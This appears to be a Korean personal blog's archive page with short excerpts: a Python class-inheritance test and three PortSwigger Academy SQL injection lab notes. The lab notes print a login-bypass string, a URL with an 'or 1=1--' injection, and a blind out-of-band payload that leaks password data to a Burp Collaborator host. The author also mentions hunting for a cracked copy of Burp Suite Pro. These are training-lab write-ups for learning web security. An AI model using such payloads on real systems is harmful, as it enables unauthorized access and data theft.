목록2020/07 (20)

Dork's port

Pyhon Class 테스트

class Baby: def __init__(self): print('Born!') def screaming(self): print('YAAAAAAA@@@@') class Adult(Baby): def __init__(self): super().__init__() print('Hey~') def smoking(self): print('- ~~~~~~@@@@@') class Old(Adult): def __init__(self): super().__init__() print('DDak DDak') def rest(self): print('Peace....') if __name__=='__main__': hanbin = Old() hanbin.screaming() hanbin.smoking() hanbin...
Develop 2020. 7. 16. 14:50
SQL-injection - SQL injection vulnerability allowing login bypass

로그인 바이패스 하는 문제로 로그인 아이디 창에 or 1=1 -- 하면 된다. 내가 문제 난이도를.. TopDown 형식으로 풀었나..?
portswigger-academy 2020. 7. 14. 16:33
SQL-injection - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

음.. 이거 LOS 할때 했던건데.. 제일 처음 문제인데 왜 마지막에 있는 지는 모르겠지만, 카테고리 필터에 SQL injection을 해서 모든 결과를 얻어내면 되는 문제. [https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories%27%20or%201=1--](https://ac7a1f091f04c4ec807b233300ac0040.web-security-academy.net/filter?category=Accessories' or 1=1--)
portswigger-academy 2020. 7. 14. 16:32
SQL-injection - Blind SQL injection with out-of-band data exfiltration

이 문제는 burp의 public server를 이용해서 풀어야하는 문제인데...burp suite의 community 버전에서는 사용이 안되고 pro 버전 이상에서 부터만 사용이 된다. 크랙 찾느라 한 2시간 삽질하다 그냥 free trial 사용하기로 결정.. 나중에 이런 형태의 injection을 하게 된다면 DNS server를 구축해서 써야겠다. 비밀번호를 얻어야하는데..이거 너무 불편한데...? 이걸로 자동화하기엔.. ' UNION SELECT CASE WHEN LENGTH(password) > 1 THEN UTL_INADDR.get_host_address('ki6wa1k0dp7sfjv4wbjv8rhc73d11q.burpcollaborator.net') ELSE NULL ..
portswigger-academy 2020. 7. 14. 16:30
Prev 1 2 3 4 5 Next